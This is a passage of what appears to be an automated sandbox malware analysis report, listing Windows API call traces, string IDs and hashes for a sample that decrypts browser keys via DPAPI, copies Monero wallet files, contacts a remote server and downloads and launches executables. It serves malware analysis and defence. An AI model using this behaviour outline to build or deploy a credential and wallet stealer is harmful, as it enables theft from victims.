                      • lstrlen.KERNEL32(00000000), ref: 0410D0AB
                      • CloseHandle.KERNEL32(00000000), ref: 0410D103
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                      • String ID:
                      • API String ID: 3555725114-3916222277
                      • Opcode ID: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                      • Instruction ID: 818f422d68a3d47bfa0061e64cf4821cd690d7b4d7ef113d99b5941ababb2a13
                      • Opcode Fuzzy Hash: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                      • Instruction Fuzzy Hash: 6CE11E75941248ABDB14EBA4DDD0FEEBB79AF54344F004169F10AA31A0EF347A89CF64
                      APIs
                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                      • RegOpenKeyExA.ADVAPI32(00000000,02516F00,00000000,00020019,00000000,004205B6), ref: 004183A4
                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                      • wsprintfA.USER32 ref: 00418459
                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                      • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                      • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseOpenlstrcpy$Enumwsprintf
                      • String ID: - $%s\%s$?
                      • API String ID: 3246050789-3278919252
                      • Opcode ID: 79a2fb80d974ac486e5468537c58b3e2968b3064256187bd92d5254366045701
                      • Instruction ID: f03ee3f6de4a678c4a24becac03c3675d5d4362b87af83515ad79f9b006405b7
                      • Opcode Fuzzy Hash: 79a2fb80d974ac486e5468537c58b3e2968b3064256187bd92d5254366045701
                      • Instruction Fuzzy Hash: B4813E75911118ABEB24DF50CD81FEAB7B9FF08714F008299E109A6180DF756BC6CFA5
                      APIs
                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                      • memset.MSVCRT ref: 00410C1C
                      • lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                      • lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                      • lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                      • lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                      • lstrcatA.KERNEL32(?,00000000), ref: 00410C88
                      • lstrcatA.KERNEL32(?,00420D84), ref: 00410C9A
                      • lstrlenA.KERNEL32(?), ref: 00410CA7
                      • memset.MSVCRT ref: 00410CCD
                      • memset.MSVCRT ref: 00410CE1
                        • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,025165B0,?,0042110C,?,00000000), ref: 0041A82B
                        • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                        • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,02519360,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                        • Part of subcall function 004196C0: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00410B85,?,00000000,?,00000000,004205C6,004205C5), ref: 004196E1
                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00410D5A
                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00410D66
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                      • String ID: .exe
                      • API String ID: 1395395982-4119554291
                      • Opcode ID: 9d55e63f4d9d76d6cfe6b41b18adec1412689ce4735271c0c32cbc5a68951b40
                      • Instruction ID: 8c4414bd7b792449c86a3c64e171a12ac7102eaeec46e1acf96b3d3d4dd6cf75
                      • Opcode Fuzzy Hash: 9d55e63f4d9d76d6cfe6b41b18adec1412689ce4735271c0c32cbc5a68951b40
                      • Instruction Fuzzy Hash: A78194B55111186BCB14FBA1CD52FEE7338AF44308F40419EB30A66082DE786AD9CF6E
                      APIs
                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0041906C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateGlobalStream
                      • String ID: image/jpeg
                      • API String ID: 2244384528-3785015651
                      • Opcode ID: e883d83a5a88c000208a0b3536991fc9b742a1aee5e23c3149dc995228aa81a1
                      • Instruction ID: d6dc09ab2bfedf2d54b470b914d8c7211c5e4dd185e8bb692af35d1d417654b8
                      • Opcode Fuzzy Hash: e883d83a5a88c000208a0b3536991fc9b742a1aee5e23c3149dc995228aa81a1
                      • Instruction Fuzzy Hash: 7D711B75A40208BBDB04EFE4DC99FEEB7B9FB48300F108509F515A7290DB38A945CB65
                      APIs
                      • strtok_s.MSVCRT ref: 00411307
                      • strtok_s.MSVCRT ref: 00411750
                        • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,025165B0,?,0042110C,?,00000000), ref: 0041A82B
                        • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: strtok_s$lstrcpylstrlen
                      • String ID:
                      • API String ID: 348468850-0
                      • Opcode ID: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
                      • Instruction ID: 4a233ae47f87f64f9a2ed81d2cca976e3c75948f423937a2df4e62cfbc7c3e06
                      • Opcode Fuzzy Hash: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
                      • Instruction Fuzzy Hash: C7C1D6B5941218ABCB14EF60DC89FEA7379BF54304F00449EF50AA7241DB78AAC5CF95
                      APIs
                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                      • ShellExecuteEx.SHELL32(0000003C), ref: 004131C5
                      • ShellExecuteEx.SHELL32(0000003C), ref: 0041335D
                      • ShellExecuteEx.SHELL32(0000003C), ref: 004134EA
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExecuteShell$lstrcpy
                      • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                      • API String ID: 2507796910-3625054190
                      • Opcode ID: fa2f7c491e836ffa03b321dca4939e5102b2c3a10a2cb7c6d0d10a73c0b6426c
                      • Instruction ID: 17233f41fb1950bff335544576ea1941aa871c2d7c6c7a5a475621d351ca9112
                      • Opcode Fuzzy Hash: fa2f7c491e836ffa03b321dca4939e5102b2c3a10a2cb7c6d0d10a73c0b6426c
                      • Instruction Fuzzy Hash: 96125F718111089ADB09FBA1DD92FEEB778AF14314F50415EF10666091EF382BDACF6A
                      APIs
                      • memset.MSVCRT ref: 0041429E
                      • memset.MSVCRT ref: 004142B5
                        • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                      • lstrcatA.KERNEL32(?,00000000), ref: 004142EC
                      • lstrcatA.KERNEL32(?,0254CAB0), ref: 0041430B
                      • lstrcatA.KERNEL32(?,?), ref: 0041431F
                      • lstrcatA.KERNEL32(?,0254CFC0), ref: 00414333
                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                        • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                        • Part of subcall function 00409CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                        • Part of subcall function 00409CE0: memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                        • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                        • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                        • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                        • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                        • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                        • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                        • Part of subcall function 004193C0: GlobalAlloc.KERNEL32(00000000,004143DD,004143DD), ref: 004193D3
                      • StrStrA.SHLWAPI(?,0254DF98), ref: 004143F3
                      • GlobalFree.KERNEL32(?), ref: 00414512
                        • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                        • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                        • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                        • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                        • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                      • lstrcatA.KERNEL32(?,00000000), ref: 004144A3
                      • StrCmpCA.SHLWAPI(?,004208D1), ref: 004144C0
                      • lstrcatA.KERNEL32(00000000,00000000), ref: 004144D2
                      • lstrcatA.KERNEL32(00000000,?), ref: 004144E5
                      • lstrcatA.KERNEL32(00000000,00420FB8), ref: 004144F4
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                      • String ID:
                      • API String ID: 1191620704-0
                      • Opcode ID: 0c9d0826f05218bba3054023445b60d50c1f9f43ea0f6b816602f798d9ef3330
                      • Instruction ID: 36ee7f3ac4f34f2e69ac811a17adbc1f593ee72d5fdd25ff7e799b1d0bb6bc25
                      • Opcode Fuzzy Hash: 0c9d0826f05218bba3054023445b60d50c1f9f43ea0f6b816602f798d9ef3330
                      • Instruction Fuzzy Hash: 0B7165B6900208BBDB14FBE0DC85FEE7379AB88304F00459DF605A7181EA78DB55CB95
                      APIs
                      • memset.MSVCRT ref: 04114505
                      • memset.MSVCRT ref: 0411451C
                        • Part of subcall function 04119047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 04119072
                      • lstrcat.KERNEL32(?,00000000), ref: 04114553
                      • lstrcat.KERNEL32(?,0064A30C), ref: 04114572
                      • lstrcat.KERNEL32(?,?), ref: 04114586
                      • lstrcat.KERNEL32(?,0064A5D8), ref: 0411459A
                        • Part of subcall function 0411A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0411A9EF
                        • Part of subcall function 04118FF7: GetFileAttributesA.KERNEL32(00000000,?,04101DBB,?,?,00425654,?,?,00420E1F), ref: 04119006
                        • Part of subcall function 04109F47: StrStrA.SHLWAPI(00000000,004212AC), ref: 04109FA0
                        • Part of subcall function 04109F47: memcmp.MSVCRT(?,0042125C,00000005), ref: 04109FF9
                        • Part of subcall function 04109C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 04109C53
                        • Part of subcall function 04109C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 04109C78
                        • Part of subcall function 04109C27: LocalAlloc.KERNEL32(00000040,?), ref: 04109C98
                        • Part of subcall function 04109C27: ReadFile.KERNEL32(000000FF,?,00000000,041016F6,00000000), ref: 04109CC1
                        • Part of subcall function 04109C27: LocalFree.KERNEL32(041016F6), ref: 04109CF7
                        • Part of subcall function 04109C27: CloseHandle.KERNEL32(000000FF), ref: 04109D01
                        • Part of subcall function 04119627: GlobalAlloc.KERNEL32(00000000,04114644,04114644), ref: 0411963A
                      • StrStrA.SHLWAPI(?,0064A0D8), ref: 0411465A
                      • GlobalFree.KERNEL32(?), ref: 04114779
                        • Part of subcall function 04109D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,04105155,00000000,00000000), ref: 04109D56
                        • Part of subcall function 04109D27: LocalAlloc.KERNEL32(00000040,?,?,?,04105155,00000000,?), ref: 04109D68
                        • Part of subcall function 04109D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,04105155,00000000,00000000), ref: 04109D91
                        • Part of subcall function 04109D27: LocalFree.KERNEL32(?,?,?,?,04105155,00000000,?), ref: 04109DA6
                        • Part of subcall function 0410A077: memcmp.MSVCRT(?,00421264,00000003), ref: 0410A094
                      • lstrcat.KERNEL32(?,00000000), ref: 0411470A
                      • StrCmpCA.SHLWAPI(?,004208D1), ref: 04114727
                      • lstrcat.KERNEL32(00000000,00000000), ref: 04114739
                      • lstrcat.KERNEL32(00000000,?), ref: 0411474C
                      • lstrcat.KERNEL32(00000000,00420FB8), ref: 0411475B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                      • String ID:
                      • API String ID: 1191620704-0
                      • Opcode ID: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                      • Instruction ID: 48b99fd58faa08b0779d535418c2b037490576d66946591f61c3240017ffb3b7
                      • Opcode Fuzzy Hash: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                      • Instruction Fuzzy Hash: 597164B6900218BBDB14FBE0DC99FEE7779AF48304F0085A8E60596190EB75E744CF55
                      APIs
                      • memset.MSVCRT ref: 00401327
                        • Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                        • Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
                        • Part of subcall function 004012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                        • Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                        • Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF
                      • lstrcatA.KERNEL32(?,00000000), ref: 0040134F
                      • lstrlenA.KERNEL32(?), ref: 0040135C
                      • lstrcatA.KERNEL32(?,.keys), ref: 00401377
                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                        • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,02519360,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465
                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                        • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                        • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                        • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                        • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                        • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                        • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                      • DeleteFileA.KERNEL32(00000000), ref: 004014EF
                      • memset.MSVCRT ref: 00401516
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                      • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                      • API String ID: 1930502592-218353709
                      • Opcode ID: 4463db9bb377a86d15231442e47ba1f91f4b22f0959258851bb336d66ceb5173
                      • Instruction ID: 456b5fac361f61c5265e43a16bd15ab14158e39c7f71a6669150f14a30e0c61c
                      • Opcode Fuzzy Hash: 4463db9bb377a86d15231442e47ba1f91f4b22f0959258851bb336d66ceb5173
                      • Instruction Fuzzy Hash: 565164B1D5011897CB15FB61DD91BED733CAF54304F4041ADB60A62092EE385BD9CBAA
                      APIs
                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                        • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                        • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,0251CF40), ref: 00406303
                        • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                        • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,0254DDD0,00000000,00000000,00400100,00000000), ref: 00406385
                        • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                        • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                      • lstrlenA.KERNEL32(00000000), ref: 0041532F
                        • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                      • StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                      • lstrlenA.KERNEL32(00000000), ref: 00415383
                      • strtok.MSVCRT(00000000,?), ref: 0041539E
                      • lstrlenA.KERNEL32(00000000), ref: 004153AE
                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                      • API String ID: 3532888709-1526165396
                      • Opcode ID: 55afdb5b044d9d0ae2ca40548a036d1fafadf4502d9a6ff2b082a7fa121a3b9b
                      • Instruction ID: 2e955e57ea7f1c083e6e45f715f374ff83ee784ca3e0e9be4ff8c8b21657e330
                      • Opcode Fuzzy Hash: 55afdb5b044d9d0ae2ca40548a036d1fafadf4502d9a6ff2b082a7fa121a3b9b
                      • Instruction Fuzzy Hash: 1A514130911108EBCB14FF61CD92AED7779AF50358F50402EF80A6B591DF386B96CB6A
                      APIs
                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                        • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                        • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                      • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 0040610F
                      • StrCmpCA.SHLWAPI(?,0251CF40), ref: 00406147
                      • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0040618F
                      • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004061B3
                      • InternetReadFile.WININET(a+A,?,00000400,?), ref: 004061DC
                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040620A
                      • CloseHandle.KERNEL32(?,?,00000400), ref: 00406249
                      • InternetCloseHandle.WININET(a+A), ref: 00406253
                      • InternetCloseHandle.WININET(00000000), ref: 00406260
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                      • String ID: a+A$a+A
                      • API String ID: 4287319946-2847607090
                      • Opcode ID: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
                      • Instruction ID: d3b4a7caf446de9355e244355c8e16b321895ac976a44b0a7cc1b08be2cc8b72
                      • Opcode Fuzzy Hash: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
                      • Instruction Fuzzy Hash: 735194B5940218ABDB20EF90DC45BEE77B9EB04305F1040ADB606B71C0DB786A85CF9A
                      APIs
                        • Part of subcall function 0411A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0411A9EF
                      • memset.MSVCRT ref: 04110E83
                      • lstrcat.KERNEL32(?,00000000), ref: 04110E9C
                      • lstrcat.KERNEL32(?,00420D7C), ref: 04110EAE
                      • lstrcat.KERNEL32(?,00000000), ref: 04110EC4
